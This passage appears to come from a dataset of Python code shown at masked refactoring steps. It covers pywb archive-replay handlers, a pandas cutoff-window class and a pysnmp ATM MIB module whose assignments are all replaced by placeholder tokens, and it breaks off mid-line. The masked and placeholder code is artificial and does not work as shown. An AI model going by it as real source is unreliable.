**kwargs)\n else:\n return WbResponse.text_response('No Lookup Url Specified')\n\n def __call__(self, wbrequest):\n # root search page\n if wbrequest.wb_url_str == '/':\n return self.render_search_page(wbrequest)\n\n # render top level frame if in frame mode\n # (not supported in proxy mode)\n if (self.is_frame_mode and wbrequest.wb_url and\n not wbrequest.wb_url.is_query() and\n not wbrequest.options['is_proxy']):\n\n if wbrequest.wb_url.is_top_frame:\n return self.get_top_frame_response(wbrequest)\n else:\n wbrequest.final_mod = 'tf_'\n\n return self.handle_request(wbrequest)\n\n def get_top_frame_params(self, wbrequest):\n embed_url = wbrequest.wb_url.to_str(mod='')\n\n if wbrequest.wb_url.timestamp:\n timestamp = wbrequest.wb_url.timestamp\n else:\n timestamp = datetime_to_timestamp(datetime.utcnow())\n\n params = dict(embed_url=embed_url,\n wbrequest=wbrequest,\n timestamp=timestamp,\n url=wbrequest.wb_url.url,\n banner_html=self.banner_html)\n\n return params\n\n def get_top_frame_response(self, wbrequest):\n params = self.get_top_frame_params(wbrequest)\n\n headers = [('Content-Type', 'text/html; charset=utf-8')]\n status_headers = StatusAndHeaders('200 OK', headers)\n\n template_result = self.frame_insert_view.render_to_string(**params)\n body = template_result.encode('utf-8')\n\n return self.response_class(status_headers, [body], wbrequest=wbrequest)\n\n\n#=================================================================\n# Standard WB Handler\n#=================================================================\nclass WBHandler(SearchPageWbUrlHandler):\n def __init__(self, query_handler, config=None):\n super(WBHandler, self).__init__(config)\n\n self.index_reader = query_handler\n\n cookie_maker = config.get('cookie_maker')\n record_loader = ArcWarcRecordLoader(cookie_maker=cookie_maker)\n\n paths = config.get('archive_paths')\n\n resolving_loader = ResolvingLoader(paths=paths,\n record_loader=record_loader)\n\n self.replay = ReplayView(resolving_loader, config)\n\n self.fallback_handler = None\n self.fallback_name = config.get('fallback')\n\n def resolve_refs(self, handler_dict):\n if self.fallback_name:\n self.fallback_handler = handler_dict.get(self.fallback_name)\n\n def handle_request(self, wbrequest):\n try:\n cdx_lines, output = self.index_reader.load_for_request(wbrequest)\n except NotFoundException as nfe:\n return self.handle_not_found(wbrequest, nfe)\n\n if output != 'text' and wbrequest.wb_url.is_replay():\n return self.handle_replay(wbrequest, cdx_lines)\n else:\n return self.handle_query(wbrequest, cdx_lines, output)\n\n def handle_query(self, wbrequest, cdx_lines, output):\n return self.index_reader.make_cdx_response(wbrequest,\n cdx_lines,\n output)\n\n def handle_replay(self, wbrequest, cdx_lines):\n cdx_callback = self.index_reader.cdx_load_callback(wbrequest)\n\n return self.replay.render_content(wbrequest,\n cdx_lines,\n cdx_callback)\n\n def handle_not_found(self, wbrequest, nfe):\n if (not self.fallback_handler or\n wbrequest.wb_url.is_query() or\n wbrequest.wb_url.is_identity):\n raise\n\n return self.fallback_handler(wbrequest)\n\n def __str__(self):\n return 'Web Archive Replay Handler'\n\n\n#=================================================================\n# Static Content Handler\n#=================================================================\nclass StaticHandler(BaseHandler):\n def __init__(self, static_path):\n mimetypes.init()\n\n self.static_path = static_path\n self.block_loader = BlockLoader()\n\n def __call__(self, wbrequest):\n url = wbrequest.wb_url_str.split('?')[0]\n full_path = self.static_path + url\n\n try:\n data = self.block_loader.load(full_path)\n\n try:\n data.seek(0, 2)\n size = data.tell()\n data.seek(0)\n headers = [('Content-Length', str(size))]\n except IOError:\n headers = None\n\n if 'wsgi.file_wrapper' in wbrequest.env:\n reader = wbrequest.env['wsgi.file_wrapper'](data)\n else:\n reader = iter(lambda: data.read(), '')\n\n content_type, _ = mimetypes.guess_type(full_path)\n\n return WbResponse.text_stream(data,\n content_type=content_type,\n headers=headers)\n\n except IOError:\n raise NotFoundException('Static File Not Found: ' +\n wbrequest.wb_url_str)\n\n def __str__(self): # pragma: no cover\n return 'Static files from ' + self.static_path\n\n\n#=================================================================\n# Debug Handlers\n#=================================================================\nclass DebugEchoEnvHandler(BaseHandler): # pragma: no cover\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest.env))\n\n\n#=================================================================\nclass DebugEchoHandler(BaseHandler): # pragma: no cover\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest))\n",
"step-ids": [
10,
19,
21,
22,
25
]
}
|
[
10,
19,
21,
22,
25
] |
from datetime import timedelta
import pandas as pd
__all__ = ["FixWindowCutoffStrategy"]
class CutoffStrategy:
"""
Class that holds a CutoffStrategy. This is a measure to prevent leakage
Parameters
----------
generate_fn: a function that generates a cutoff time for a given entity.
input: entity rows
output: a training cutoff in np.datetime64 format
Returns
-------
CutoffStrategy Instance
"""
def __init__(self, generate_fn, description='undescribed cutoff strategy'):
self.generate_fn = generate_fn
self.description = description
class FixWindowCutoffStrategy(CutoffStrategy):
def __init__(self, entity_col, cutoff_base, cutoff_end, cutoff_window):
self.description = "in next {} days".format(cutoff_window)
self.cutoff_base = cutoff_base
self.cutoff_end = cutoff_end
self.cutoff_window = cutoff_window
self.entity_col = entity_col
def generate_cutoffs(self, df):
cutoff_st_ed_pairs = []
current = self.cutoff_base
while True:
current_end = current + timedelta(days=self.cutoff_window)
if current_end > self.cutoff_end:
break
cutoff_st_ed_pairs.append((current, current_end))
current = current_end
entity_cutoffs = []
for entity_name in set(df[self.entity_col]):
for cutoff_st, cutoff_ed in cutoff_st_ed_pairs:
entity_cutoffs.append((entity_name, cutoff_st, cutoff_ed))
return pd.DataFrame(entity_cutoffs, columns=[self.entity_col, "cutoff_st", "cutoff_ed"])
|
normal
|
{
"blob_id": "30f030d48368e1b103f926ee7a15b4b75c4459c7",
"index": 7030,
"step-1": "<mask token>\n\n\nclass CutoffStrategy:\n <mask token>\n\n def __init__(self, generate_fn, description='undescribed cutoff strategy'):\n self.generate_fn = generate_fn\n self.description = description\n\n\nclass FixWindowCutoffStrategy(CutoffStrategy):\n\n def __init__(self, entity_col, cutoff_base, cutoff_end, cutoff_window):\n self.description = 'in next {} days'.format(cutoff_window)\n self.cutoff_base = cutoff_base\n self.cutoff_end = cutoff_end\n self.cutoff_window = cutoff_window\n self.entity_col = entity_col\n\n def generate_cutoffs(self, df):\n cutoff_st_ed_pairs = []\n current = self.cutoff_base\n while True:\n current_end = current + timedelta(days=self.cutoff_window)\n if current_end > self.cutoff_end:\n break\n cutoff_st_ed_pairs.append((current, current_end))\n current = current_end\n entity_cutoffs = []\n for entity_name in set(df[self.entity_col]):\n for cutoff_st, cutoff_ed in cutoff_st_ed_pairs:\n entity_cutoffs.append((entity_name, cutoff_st, cutoff_ed))\n return pd.DataFrame(entity_cutoffs, columns=[self.entity_col,\n 'cutoff_st', 'cutoff_ed'])\n",
"step-2": "<mask token>\n\n\nclass CutoffStrategy:\n \"\"\"\n Class that holds a CutoffStrategy. This is a measure to prevent leakage\n\n Parameters\n ----------\n generate_fn: a function that generates a cutoff time for a given entity.\n input: entity rows\n output: a training cutoff in np.datetime64 format\n\n Returns\n -------\n CutoffStrategy Instance\n \"\"\"\n\n def __init__(self, generate_fn, description='undescribed cutoff strategy'):\n self.generate_fn = generate_fn\n self.description = description\n\n\nclass FixWindowCutoffStrategy(CutoffStrategy):\n\n def __init__(self, entity_col, cutoff_base, cutoff_end, cutoff_window):\n self.description = 'in next {} days'.format(cutoff_window)\n self.cutoff_base = cutoff_base\n self.cutoff_end = cutoff_end\n self.cutoff_window = cutoff_window\n self.entity_col = entity_col\n\n def generate_cutoffs(self, df):\n cutoff_st_ed_pairs = []\n current = self.cutoff_base\n while True:\n current_end = current + timedelta(days=self.cutoff_window)\n if current_end > self.cutoff_end:\n break\n cutoff_st_ed_pairs.append((current, current_end))\n current = current_end\n entity_cutoffs = []\n for entity_name in set(df[self.entity_col]):\n for cutoff_st, cutoff_ed in cutoff_st_ed_pairs:\n entity_cutoffs.append((entity_name, cutoff_st, cutoff_ed))\n return pd.DataFrame(entity_cutoffs, columns=[self.entity_col,\n 'cutoff_st', 'cutoff_ed'])\n",
"step-3": "<mask token>\n__all__ = ['FixWindowCutoffStrategy']\n\n\nclass CutoffStrategy:\n \"\"\"\n Class that holds a CutoffStrategy. This is a measure to prevent leakage\n\n Parameters\n ----------\n generate_fn: a function that generates a cutoff time for a given entity.\n input: entity rows\n output: a training cutoff in np.datetime64 format\n\n Returns\n -------\n CutoffStrategy Instance\n \"\"\"\n\n def __init__(self, generate_fn, description='undescribed cutoff strategy'):\n self.generate_fn = generate_fn\n self.description = description\n\n\nclass FixWindowCutoffStrategy(CutoffStrategy):\n\n def __init__(self, entity_col, cutoff_base, cutoff_end, cutoff_window):\n self.description = 'in next {} days'.format(cutoff_window)\n self.cutoff_base = cutoff_base\n self.cutoff_end = cutoff_end\n self.cutoff_window = cutoff_window\n self.entity_col = entity_col\n\n def generate_cutoffs(self, df):\n cutoff_st_ed_pairs = []\n current = self.cutoff_base\n while True:\n current_end = current + timedelta(days=self.cutoff_window)\n if current_end > self.cutoff_end:\n break\n cutoff_st_ed_pairs.append((current, current_end))\n current = current_end\n entity_cutoffs = []\n for entity_name in set(df[self.entity_col]):\n for cutoff_st, cutoff_ed in cutoff_st_ed_pairs:\n entity_cutoffs.append((entity_name, cutoff_st, cutoff_ed))\n return pd.DataFrame(entity_cutoffs, columns=[self.entity_col,\n 'cutoff_st', 'cutoff_ed'])\n",
"step-4": "from datetime import timedelta\nimport pandas as pd\n__all__ = ['FixWindowCutoffStrategy']\n\n\nclass CutoffStrategy:\n \"\"\"\n Class that holds a CutoffStrategy. This is a measure to prevent leakage\n\n Parameters\n ----------\n generate_fn: a function that generates a cutoff time for a given entity.\n input: entity rows\n output: a training cutoff in np.datetime64 format\n\n Returns\n -------\n CutoffStrategy Instance\n \"\"\"\n\n def __init__(self, generate_fn, description='undescribed cutoff strategy'):\n self.generate_fn = generate_fn\n self.description = description\n\n\nclass FixWindowCutoffStrategy(CutoffStrategy):\n\n def __init__(self, entity_col, cutoff_base, cutoff_end, cutoff_window):\n self.description = 'in next {} days'.format(cutoff_window)\n self.cutoff_base = cutoff_base\n self.cutoff_end = cutoff_end\n self.cutoff_window = cutoff_window\n self.entity_col = entity_col\n\n def generate_cutoffs(self, df):\n cutoff_st_ed_pairs = []\n current = self.cutoff_base\n while True:\n current_end = current + timedelta(days=self.cutoff_window)\n if current_end > self.cutoff_end:\n break\n cutoff_st_ed_pairs.append((current, current_end))\n current = current_end\n entity_cutoffs = []\n for entity_name in set(df[self.entity_col]):\n for cutoff_st, cutoff_ed in cutoff_st_ed_pairs:\n entity_cutoffs.append((entity_name, cutoff_st, cutoff_ed))\n return pd.DataFrame(entity_cutoffs, columns=[self.entity_col,\n 'cutoff_st', 'cutoff_ed'])\n",
"step-5": "from datetime import timedelta\n\nimport pandas as pd\n\n__all__ = [\"FixWindowCutoffStrategy\"]\n\n\nclass CutoffStrategy:\n \"\"\"\n Class that holds a CutoffStrategy. This is a measure to prevent leakage\n\n Parameters\n ----------\n generate_fn: a function that generates a cutoff time for a given entity.\n input: entity rows\n output: a training cutoff in np.datetime64 format\n\n Returns\n -------\n CutoffStrategy Instance\n \"\"\"\n\n def __init__(self, generate_fn, description='undescribed cutoff strategy'):\n self.generate_fn = generate_fn\n self.description = description\n\n\nclass FixWindowCutoffStrategy(CutoffStrategy):\n def __init__(self, entity_col, cutoff_base, cutoff_end, cutoff_window):\n self.description = \"in next {} days\".format(cutoff_window)\n self.cutoff_base = cutoff_base\n self.cutoff_end = cutoff_end\n self.cutoff_window = cutoff_window\n self.entity_col = entity_col\n\n def generate_cutoffs(self, df):\n cutoff_st_ed_pairs = []\n\n current = self.cutoff_base\n while True:\n current_end = current + timedelta(days=self.cutoff_window)\n if current_end > self.cutoff_end:\n break\n cutoff_st_ed_pairs.append((current, current_end))\n current = current_end\n\n entity_cutoffs = []\n for entity_name in set(df[self.entity_col]):\n for cutoff_st, cutoff_ed in cutoff_st_ed_pairs:\n entity_cutoffs.append((entity_name, cutoff_st, cutoff_ed))\n\n return pd.DataFrame(entity_cutoffs, columns=[self.entity_col, \"cutoff_st\", \"cutoff_ed\"])\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvRecoverySubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoRecoverySubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoOptimizationSubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoConnectionRecovered.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoRecoverySubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoConnectionRecovered.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrConnectionRecovery.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrPathOptimization.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrSubscribedConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrEligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfUniEbrTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrConnectionRecovery.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrPathOptimization.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrSubscribedConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrEligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfIispEbrTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrConnectionRecovery.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrPathOptimization.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrSubscribedConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrEligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrConnectionRecovery.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrPathOptimization.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrSubscribedConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrConnectionRecovery.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrPathOptimization.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrSubscribedConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrEligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
